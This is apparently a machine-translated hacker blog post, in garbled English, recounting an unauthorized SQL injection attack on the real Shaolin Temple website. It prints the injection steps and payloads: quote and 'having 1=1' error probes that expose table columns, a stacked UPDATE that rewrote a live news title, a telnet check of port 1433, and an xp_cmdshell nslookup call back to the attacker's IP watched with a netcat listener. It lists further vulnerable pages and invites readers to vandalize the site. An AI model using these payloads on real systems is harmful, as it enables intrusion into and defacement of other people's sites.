Just heard a message from the News: Shaolin website published martial arts tips; hehe! This is more fun!
by the way to the Shaolin Temple website and looked at it, http://www.shaolin.org.cn/
opened, see a news system, random browsing a few news, are HTML, it seems that there is no problem, but when I put the mouse on the first page of the news, found his connection is "Javascript:mm_openbrwindow". /.. /.. /asp/news_article.asp?
newsid=649 ', ' News ', ' scrollbars=yes,width=520,height=400 ') ", you may notice that there may be injection, I also have nothing to watch TV, then infiltrate a try."
1, enter the address:
http://www.shaolin.org.cn/../../../asp/news_article.asp?newsid=649,
can open the news, stating that the URL is correct, add ' after ', return
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
Unclosed quotation mark before the character string '.
/asp/lib/lib.asp, line 710
----------------------------------------------------------------------------------
should be an SQL database.
2, use ' having 1=1-, hint
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
Column ' Shaolin_newslist.newsid ' is invalid in the select list because it isn't
Contained in a aggregate function and there is no GROUP by clause.
/asp/lib/lib.asp, line 710
----------------------------------------------------------------------------------
will soon be able to get all the fields of its table shaolin_newslist: NewSID, Newsupdatedat, Newstitle, newscontent
3, Next I tested the database user permissions
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649 ';
Update%20shaolin_newslist%20set%20newstitle= ' Shao Lin Medicine Bureau hundreds of health recipes for the first time to the world public! ' %20where%20newsid=649--
Chart:
<p>alt= "photo. JPG (663395 bytes) "width=" 527 "height=" 234 "></p>
appears to have full authority on the table, you can delete and change
4, then look at the 1433.
telnet www.shaolin.org.cn 1433
looks open.
5, try the database operator's permissions
local listening UDP 53:nc–u–l–p 53
then visits:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649 ';
exec master.dbo.xp_cmdshell ' nslookup a.com *.*.*.* '--
* for my IP address,
no response, then it should not be sysadmin authority.
It seems that the permissions are these, because there is no system to gather information, also do not intend to do, so far! In fact, there are many pages that have this problem, such as:
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
in the position of passing parameters, see the martial arts? If you like, you can give him a "XXX" something, hehe!
in fact, 1 years ago used a similar method to test the local relatively large number of port, then they submitted a vulnerability report, but the loopholes are still there, in order not to cause trouble to themselves, has not been published, or so they repaired, I will release the details!
====================================================================================================
to network Management no response, in BBS, I registered Coolersky, anyway did not find how to post, no! Resign yourself to the fate of the best not to be small Japan to fix!
